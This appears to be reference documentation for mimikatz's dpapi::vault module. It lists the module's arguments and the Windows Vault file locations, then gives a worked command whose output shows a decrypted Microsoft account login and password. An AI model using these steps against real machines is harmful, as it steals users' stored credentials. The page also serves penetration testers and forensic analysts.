vault
dpapi::vault decrypts DPAPI vault credentials from the Credential Store. It takes the following command-line arguments:
  • /cred: path to the .vcrd credential file to decrypt. These files can be found at C:\Users\<UserName>\AppData\Local\Microsoft\Vault, C:\Users\<UserName>\AppData\Roaming\Microsoft\Vault, C:\ProgramData\Microsoft\Vault and C:\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\Vault
  • /policy: path to the Policy.vpol file that accompanies the credential. It can be found at C:\ProgramData\Microsoft\Vault\ (in the example below it sits in the same vault directory as the .vcrd file)
  • /password: the password used to decrypt the vault credentials
  • /masterkey: the master key to use for decryption, given as a hex string. It can be obtained through sekurlsa::dpapi.
  • /unprotect: display the decrypted results on screen
mimikatz # dpapi::vault /cred:"C:\Users\m3g9tr0n\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\21CD6FA9B5E4C7D1D04AE0182DD7F440F54E02ED.vcrd" /policy:"C:\Users\m3g9tr0n\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28\Policy.vpol" /masterkey:3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
**VAULT CREDENTIAL**
SchemaId : {3ccd5499-87a8-4b10-a215-608888dd3b55}
unk0 : 00000004 - 4
LastWritten : 13/12/2021 21:33:59
unk1 : ffffffff - 4294967295
unk2 : 00000000 - 0
FriendlyName : Internet Explorer
dwAttributesMapSize : 00000030 - 48
* Attribute 1 @ offset 00000080 - 128 (unk 00000020 - 32)
* Attribute 2 @ offset 000000b5 - 181 (unk 00000020 - 32)
* Attribute 3 @ offset 000000ea - 234 (unk 00000020 - 32)
* Attribute 100 @ offset 00000100 - 256 (unk 00000020 - 32)
**VAULT CREDENTIAL ATTRIBUTE**
id : 00000001 - 1
unk0/1/2: 00000002/00000007/0000000a
Data : 168989db87d1e9011a33035f2aa7d104ba57ed82ca427d10b07ca202c8f1d272
**VAULT CREDENTIAL ATTRIBUTE**
id : 00000002 - 2
unk0/1/2: 00000002/00000007/0000000a
Data : ee08e5dc3f49367fc97b4facc65a748b27f3d814fe4ce177c1eee8c221928839
**VAULT CREDENTIAL ATTRIBUTE**
id : 00000003 - 3
unk0/1/2: 00000000/00000007/0000000a
**VAULT CREDENTIAL ATTRIBUTE**
id : 00000064 - 100
unk0/1/2: 00000000/00000008/0000000a
IV : edd18a92b5db9a1984bd6600240b642a
Data : 9c8f1a59cd4c3a7288c7612e51ba9822bda64128729eb0bd501e182a3eca1890a7212a41836961320fb07651c7206185a8c39f64f1ac60d244e38a3be85b766ed6d7db5973a2b527c3eb4f0900fbef5f03cc14a9b333148316fbc06098c47ced7af023b4c74c2409c446e95156e16633538c5df6899cb14266445efcbe0b8a5b592806a31cdbdf061ca6086e6086af44c2631bdc393d30174a81cd86816b9472c68fe274592c024f0526ff5cf5aa43a960b1a5bf10468876bcda3412507ea393a21cbb617bc93ad8f08f21ad83aa8055
​
**VAULT POLICY**
version : 00000001 - 1
vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
Name : Web Credentials
unk0/1/2: 00000001/00000000/00000001
**VAULT POLICY KEY**
unk0 : {dd73da0b-fd83-4712-af8b-d153c710c6b9}
unk1 : {dd73da0b-fd83-4712-af8b-d153c710c6b9}
**BLOB**
dwVersion : 00000001 - 1
guidProvider : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
dwMasterKeyVersion : 00000001 - 1
guidMasterKey : {5c22983f-77ee-41e4-9086-8073d664e417}
dwFlags : 20000000 - 536870912 (system ; )
dwDescriptionLen : 00000000 - 0
szDescription : (null)
algCrypt : 00006603 - 26115 (CALG_3DES)
dwAlgCryptLen : 000000c0 - 192
dwSaltLen : 00000010 - 16
pbSalt : 07da103f232873a46fcaba89df0a9b53
dwHmacKeyLen : 00000000 - 0
pbHmackKey :
algHash : 00008004 - 32772 (CALG_SHA1)
dwAlgHashLen : 000000a0 - 160
dwHmac2KeyLen : 00000010 - 16
pbHmack2Key : c66b772816ab01918d13cafea8163d12
dwDataLen : 00000068 - 104
pbData : e3ce970b77864701ac345f5f3afef1419f36e628ce32e5053e13fc81727acfc62d7d70126ea5b3e3686bf527bb7ec6f609dc787d10b1329e524994a59d81a2e79115c55127c63d28ba75fa000425d650d21b01465c6affbe5f9b4d01aaa143b3e993042a6b63c1e7
dwSignLen : 00000014 - 20
pbSign : c39e8a8fb985ac20bc0a607485f49d7fbe45b678
​
​
​
Decrypting Policy Keys:
* volatile cache: GUID:{5c22983f-77ee-41e4-9086-8073d664e417};KeyHash:850247e2dd89c50536c05bdcee1a56c395e752cf;Key:available
* masterkey : 3f7a17dd6658319fcd4b832afc20ac7dacbb9d7cd668527c71f98e90464624634c614a7923a3beb23c4e24dd718f2a8e838ce72935fb29f11507affb543a53c3
AES128 key: 0fdfe3d0bf2550e7fd25f37898b3dd77
AES256 key: 888bb82eca576c5d154f024d2980b9a1eacb904ad86b1265ac25b816f57fb3d7
​
> Attribute 1 : 7b506f2d6b81d939a8e0456f036ee8970856ff70
> Attribute 2 : 0a0c5eef791157ee37f51258c5747ee205a4f18c
> Attribute 3 :
> Attribute 100 :
**VAULT CREDENTIAL CLEAR ATTRIBUTES**
version: 00000001 - 1
count : 00000004 - 4
unk : 00000001 - 1
​
* identity : [email protected]
* ressource : https://login.live.com/
* authenticator : MySuperDuperPass
* property 100 : c5 a6 4d 4e 34 22 d9 4a a5 9d c8 66 c8 3e cb a6